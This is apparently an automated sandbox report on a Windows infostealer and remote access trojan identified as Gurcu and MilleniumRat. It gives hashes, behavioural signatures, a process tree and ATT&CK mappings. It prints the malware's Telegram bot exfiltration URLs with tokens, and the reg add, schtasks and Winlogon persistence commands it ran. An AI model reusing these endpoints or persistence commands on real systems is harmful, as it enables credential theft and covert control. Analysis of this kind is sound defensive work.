Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
10-11-2024 11:20
Static task
static1
Behavioral task
behavioral1
Sample
main.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
main.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
main.exe
Resource
win11-20241007-en
General
-
Target
main.exe
-
Size
5.6MB
-
MD5
3d3c49dd5d13a242b436e0a065cd6837
-
SHA1
e38a773ffa08452c449ca5a880d89cfad24b6f1b
-
SHA256
e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf
-
SHA512
dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00
-
SSDEEP
98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR6s:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciY
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getFile?file_id=BQACAgEAAyEFAASF2AHzAALot2cwl0BsiwRCNZBujRngGnrQkjblAAJqBAAC1teJRaUx1s99WQqNNg
https://api.telegram.org/bot7457548429:AAGMvKYWjBbGXayEC5uoksRl1i2BIy7ylDg/sendMessage?chat_id=6024388590
https://api.telegram.org/bot7457548429:AAGMvKYWjBbGXayEC5uoksRl1i2BIy7ylDg/getUpdates?offset=-
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Milleniumrat family
-
Modifies WinLogon for persistence 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\spoolsv.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\spoolsv.exe\", \"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Idle.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\spoolsv.exe\", \"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Idle.exe\", \"C:\\Users\\Admin\\Start Menu\\fontdrvhost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\spoolsv.exe\", \"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Idle.exe\", \"C:\\Users\\Admin\\Start Menu\\fontdrvhost.exe\", \"C:\\Program Files (x86)\\Windows Defender\\dllhost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\"" ChainComServermonitor.exe -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2860 4448 schtasks.exe 79 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4496 4448 schtasks.exe 79 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4712 4448 schtasks.exe 79 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4272 4448 schtasks.exe 79 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4064 4448 schtasks.exe 79 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 548 4448 schtasks.exe 79 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 868 4448 schtasks.exe 79 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3940 4448 schtasks.exe 79 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3380 4448 schtasks.exe 79 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2056 4448 schtasks.exe 79 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1572 4448 schtasks.exe 79 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1452 4448 schtasks.exe 79 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3432 4448 schtasks.exe 79 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4648 4448 schtasks.exe 79 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4056 4448 schtasks.exe 79 -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
pid Process 3872 Update.exe 3892 svchost64.exe 700 ChainComServermonitor.exe 3112 dllhost.exe -
Loads dropped DLL 2 IoCs
pid Process 868 main.exe 3872 Update.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\spoolsv.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\spoolsv.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Idle.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Admin\\Start Menu\\fontdrvhost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Admin\\Start Menu\\fontdrvhost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\MSBuild\\RuntimeBroker.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Idle.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Defender\\dllhost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Defender\\dllhost.exe\"" ChainComServermonitor.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 7 raw.githubusercontent.com 1 raw.githubusercontent.com 5 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSC26044B8DD8DC46CF83951E88991427A1.TMP csc.exe File created \??\c:\Windows\System32\j7xqt2.exe csc.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3856 tasklist.exe -
Drops file in Program Files directory 9 IoCs
description ioc Process File created C:\Program Files (x86)\MSBuild\RuntimeBroker.exe ChainComServermonitor.exe File created C:\Program Files (x86)\MSBuild\9e8d7a4ca61bd9 ChainComServermonitor.exe File created C:\Program Files\Microsoft Office 15\ClientX64\6ccacd8608530f ChainComServermonitor.exe File opened for modification C:\Program Files (x86)\MSBuild\RuntimeBroker.exe ChainComServermonitor.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe ChainComServermonitor.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\f3b6ecef712a24 ChainComServermonitor.exe File created C:\Program Files\Microsoft Office 15\ClientX64\Idle.exe ChainComServermonitor.exe File created C:\Program Files (x86)\Windows Defender\dllhost.exe ChainComServermonitor.exe File created C:\Program Files (x86)\Windows Defender\5940a34987c991 ChainComServermonitor.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1572 timeout.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings svchost64.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings ChainComServermonitor.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3992 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4272 schtasks.exe 548 schtasks.exe 4056 schtasks.exe 2860 schtasks.exe 3380 schtasks.exe 1572 schtasks.exe 3432 schtasks.exe 1452 schtasks.exe 4648 schtasks.exe 4496 schtasks.exe 4064 schtasks.exe 868 schtasks.exe 2056 schtasks.exe 4712 schtasks.exe 3940 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 868 main.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe 3872 Update.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 868 main.exe Token: SeDebugPrivilege 3856 tasklist.exe Token: SeDebugPrivilege 3872 Update.exe Token: SeDebugPrivilege 700 ChainComServermonitor.exe Token: SeDebugPrivilege 3112 dllhost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3872 Update.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 868 wrote to memory of 1140 868 main.exe 80 PID 868 wrote to memory of 1140 868 main.exe 80 PID 1140 wrote to memory of 3856 1140 cmd.exe 82 PID 1140 wrote to memory of 3856 1140 cmd.exe 82 PID 1140 wrote to memory of 2056 1140 cmd.exe 83 PID 1140 wrote to memory of 2056 1140 cmd.exe 83 PID 1140 wrote to memory of 1572 1140 cmd.exe 84 PID 1140 wrote to memory of 1572 1140 cmd.exe 84 PID 1140 wrote to memory of 3872 1140 cmd.exe 85 PID 1140 wrote to memory of 3872 1140 cmd.exe 85 PID 3872 wrote to memory of 2980 3872 Update.exe 86 PID 3872 wrote to memory of 2980 3872 Update.exe 86 PID 2980 wrote to memory of 3992 2980 cmd.exe 88 PID 2980 wrote to memory of 3992 2980 cmd.exe 88 PID 3872 wrote to memory of 3892 3872 Update.exe 89 PID 3872 wrote to memory of 3892 3872 Update.exe 89 PID 3872 wrote to memory of 3892 3872 Update.exe 89 PID 3892 wrote to memory of 1892 3892 svchost64.exe 90 PID 3892 wrote to memory of 1892 3892 svchost64.exe 90 PID 3892 wrote to memory of 1892 3892 svchost64.exe 90 PID 1892 wrote to memory of 3100 1892 WScript.exe 91 PID 1892 wrote to memory of 3100 1892 WScript.exe 91 PID 1892 wrote to memory of 3100 1892 WScript.exe 91 PID 3100 wrote to memory of 700 3100 cmd.exe 93 PID 3100 wrote to memory of 700 3100 cmd.exe 93 PID 700 wrote to memory of 3516 700 ChainComServermonitor.exe 97 PID 700 wrote to memory of 3516 700 ChainComServermonitor.exe 97 PID 3516 wrote to memory of 4580 3516 csc.exe 99 PID 3516 wrote to memory of 4580 3516 csc.exe 99 PID 700 wrote to memory of 2124 700 ChainComServermonitor.exe 100 PID 700 wrote to memory of 2124 700 ChainComServermonitor.exe 100 PID 2124 wrote to memory of 3404 2124 csc.exe 102 PID 2124 wrote to memory of 3404 2124 csc.exe 102 PID 700 wrote to memory of 4408 700 ChainComServermonitor.exe 115 PID 700 wrote to memory of 4408 700 ChainComServermonitor.exe 115 PID 4408 wrote to memory of 4644 4408 cmd.exe 117 PID 4408 wrote to memory of 4644 4408 cmd.exe 117 PID 4408 wrote to memory of 3992 4408 cmd.exe 118 PID 4408 wrote to memory of 3992 4408 cmd.exe 118 PID 4408 wrote to memory of 3112 4408 cmd.exe 119 PID 4408 wrote to memory of 3112 4408 cmd.exe 119 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\main.exe"C:\Users\Admin\AppData\Local\Temp\main.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp7BA8.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp7BA8.tmp.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 868"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3856
-
-
C:\Windows\system32\find.exefind ":"3⤵PID:2056
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak3⤵
- Delays execution with timeout.exe
PID:1572
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f4⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:3992
-
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe"C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"7⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\43k4gauj\43k4gauj.cmdline"8⤵
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8400.tmp" "c:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\CSCD88D0256430145EB99A32A344BDD41A7.TMP"9⤵PID:4580
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lkywtov5\lkywtov5.cmdline"8⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES847D.tmp" "c:\Windows\System32\CSC26044B8DD8DC46CF83951E88991427A1.TMP"9⤵PID:3404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eXK6l6ZVYg.bat"8⤵
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\system32\chcp.comchcp 650019⤵PID:4644
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:3992
-
-
C:\Program Files (x86)\Windows Defender\dllhost.exe"C:\Program Files (x86)\Windows Defender\dllhost.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2860
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4496
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\MSBuild\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4712
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4272
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4064
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:548
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:868
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Start Menu\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Admin\Start Menu\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1572
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Start Menu\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1452
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Defender\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3432
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4648
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Defender\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4056
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
1KB
MD5e62432202bfc6c0fb175151e67691ce5
SHA16aca52701daecb27d7f1134ec2da25e0751c6d6b
SHA25650687a8563a96d47915aa4dc43ff3a8eb9528163f1d395c9db9c345ca0e7ab16
SHA512999721c24431904f282fe3bc5de1eeb33fdc17d333f1f819895e402ed87b25d410eab9aae52ec0e8db122bb56f3295c99cd75b735e70ac4fce92df799d5a4f0b
-
Filesize
1KB
MD5e3b8a50d391016a0e30dc89457c5944a
SHA199584326a48f2005c77cd3cbcc38843b9202bfed
SHA2564072eb954e923acf1eb59cb3eb6c78605a7aaec15741219111b6a909b1c4f3e4
SHA51225f8b333fccce7b0e7caeec23c5d6f7f8b72b9972ea399b0ea8cad5ae4e8a3d56ada4469b841ab5e864c4c666f3abc163639785e6c5fd4ccc4faf0a9b073f1c0
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
112KB
MD587210e9e528a4ddb09c6b671937c79c6
SHA13c75314714619f5b55e25769e0985d497f0062f2
SHA256eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1
SHA512f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0
-
Filesize
114KB
MD5afa91d0e885d8134404af3c064a6a0ec
SHA166d953b18606bc7cda08c696c63dba55a42b96f1
SHA256f31b695e180fdf8c23a1d053a067d66b38399aca4bd4cc7693844b895e819545
SHA5125d9cb1c6c6af903f951c5aef98fcda48c7f12a5d484289dbf57745134323595462a7ad3b5d711dd2988a12efdb03e3f77b46d6be7c4232ac3ff1e41fb82bb2ec
-
Filesize
227B
MD50da15e65648e4280c3b0502bb1724145
SHA152ab4164e2813b0c5a4065669c03e37dcea8ed39
SHA2568e002757d6e86a7d5c71ea4ff2c81768fd7ffef4a8433af81ee7a0b9439825c4
SHA5120df7f5496aa5fff1db3dc411317d94916598e5351de7b0a331f3362b1dfaa181650439cf6af427cd14e1781687465b7e823ffa5f4a2d557f17d9cfd348c5523e
-
Filesize
3.5MB
MD55fe249bbcc644c6f155d86e8b3cc1e12
SHA1f5c550ab2576d2daeff9cb72a4d41d1bcfee0e6d
SHA2569308b0ce7206c60517db7207c488b4fa1cc313413e5378d8bac63b22cabcdd80
SHA512b210c6b5d8db31d8f4ea82a79fe4679ced289636570e3fd72a45c488fd2cd75ed74677d723c1bfa67432e46e71901cb6551595e1053448c2f5e297829a6e1b39
-
Filesize
103B
MD577218ae27e9ad896918d9a081c61b1be
SHA13c8ebaa8fa858b82e513ccf482e11172b0f52ce0
SHA256e09540a47f3647a9fdf9673281e2664441bbaee8d3236d22b1875b9d23abacab
